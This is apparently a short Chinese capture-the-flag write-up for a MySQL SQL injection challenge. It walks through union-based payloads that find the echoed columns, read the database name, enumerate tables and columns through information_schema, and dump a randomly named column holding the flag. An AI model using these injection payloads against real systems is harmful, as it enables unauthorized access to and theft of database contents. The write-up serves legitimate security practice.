原题
解题思路
前面的几题用的都是MySQL的数据库,所以这里的解法其实和整数型、字符型注入区别不大。
按提示输入一个1,回显有两列,看看这两列是不是都有用。
看起来两个都有用
-1 union select 11,22
那接下来就依次看数据库名、表名、列名和flag名就行。
-1 union select 11,database()
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
终于不是用flag做表名,下面依次看两个表的内容就行。news之前几题都与flag出现过,应该是把flag换成pvrxgcvlli 。
-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='pvrxgcvlli'
列名也变了。
-1 union select 1,group_concat(fqgxuedori) from pvrxgcvlli